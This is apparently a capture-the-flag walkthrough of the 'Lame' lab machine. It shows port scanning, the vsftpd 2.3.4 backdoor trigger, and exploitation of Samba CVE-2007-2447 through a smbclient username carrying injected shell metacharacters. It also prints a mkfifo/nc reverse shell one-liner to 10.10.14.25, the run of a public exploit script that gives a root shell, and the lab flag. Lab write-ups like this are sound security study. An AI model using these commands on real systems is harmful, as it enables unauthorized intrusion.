Lame

Scanning

sudo nmap -A -T4 -v -p- 10.10.10.3 -oA scans/scan

Open ports:

Discovered open port 22/tcp on 10.10.10.3
Discovered open port 21/tcp on 10.10.10.3
Discovered open port 139/tcp on 10.10.10.3
Discovered open port 445/tcp on 10.10.10.3

SSH, FTP, SMB

Anonymous login via FTP?

Nothing in the FTP server, lets check versions

Vulnerability Analysis

Searchsploit for this version?

searchsploit vsftp 2.3.4

Looks like RCE via CVE-2011-2523

Lets try it

It’s hanging, can we do it manually? Let’s review the code.

Backdoor is opened by logging in with

user: nergal:)
password: pass

Once you do so, a shell is opened on port 6200

Lets try it.

Not working, different script?

Embed GitHub

Still not working, SMB is also open lets see what shares we can access with a null session

hmmmmmmmmmmmmm /tmp???

Nothing in these files. Lets check the Samba version

Looks like we have command execution from a metasploit module. Lets read the code and try manually.

“By specifying a username containing shell meta characters, attackers can execute arbitrary commands.”

Lets research for a python version

This is easier for me to understand

We can execute a command after specifying the shell meta chars. Lets try.

that worked!

Exploitation

smbclient -U '/=`nohup nc 10.10.14.25 443 `' //10.10.10.3/tmp

Now that we know it’s executing, lets change it to a revshell.

Gonna use this one, but execute it with curl.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 443 >/tmp/f

I was having issues executing commands because the first command was getting capitalized.

I reverted to using a pre-built python script i found here:

GitHub - amriunix/CVE-2007-2447: CVE-2007-2447 - Samba usermap script

CVE-2007-2447 - Samba usermap script. Contribute to amriunix/CVE-2007-2447 development by creating an account on GitHub.

github.com

python3 expl.py 10.10.10.3 139 10.10.14.25 443

and we have a root shell.

Flag

767818ef14facd01a9e270c3ec6bbcf8